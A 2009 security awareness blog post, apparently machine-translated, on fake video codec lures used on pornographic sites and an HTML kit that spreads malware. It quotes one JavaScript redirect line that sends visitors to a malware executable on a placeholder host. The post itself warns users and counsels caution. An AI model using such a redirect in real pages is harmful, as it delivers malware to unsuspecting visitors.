Tuesday, January 27, 2009

Deception techniques that do not go out of fashion

Are we children of rigor?

One issue that motivates daily reflection is why some users are still falling into traps and otherwise known.

Social engineering techniques such as double extension files, spaces between the file name and extension, and since it began using the Internet as a platform for attack, techniques such as fake codecs are a small sample of some of them.

Web sites that host pornographic material are the most visited online and also the most used by disseminators malware to propagate threats. And rather than ask ourselves how it can still be possible for users continue infecting their computers through the strategies of deception, the answer would seem to lie in something as simple as to justify a "high demand" by the consumption of such material as one of the most wanted.

Malware creators are well aware that the thing is, and that the person who visits a pornographic site, wants to see pornography, regardless of the format in which this resource (video and/or image), including, if that offers the user downloads an even number, false codecs to view the video course, it is likely that in most cases, the user download.

So will see something like the screen shown in the capture, which take a few seconds to display a pop-ups similar the following:

The user, thinking that this is a codec needed to display video, installs it. In fact, it is one that installs malware, to date only detected by some antivirus companies.

On the other hand, there is an application consisting of an HTML file that is used to propagate massively by any means and this type of action.

The application doesn't create or modify, but malicious code that allows them to spread through the classic mode mentioned. The only requirement is hosted on a server (or zombie PC) and specify the HTML code in your address download malware in the next portion of code.

window.setTimeout ( "location.href = 'http://servidor.com/archivo.exe", 1000);

As additional components, the kit also proposes to redirect the display of a real video. This is part of the strategy of social engineering and seeks to clear any suspicion from the user.

We no longer speak only of techniques such as Drive-by-Download, exploit, scripting, code obfuscation, among many others, but we are talking about caution and common sense.

That is not enough just to trust the security risks caused by malicious code and antivirus solutions that, in this case and according to the report VT, AV currently offer only a 35.09% protection, where only 14 of 39 detect the threat, the other 64.91% will depend significantly on our ability and common sense to detect potential malicious activity.

# Jorge Mieres

No comments: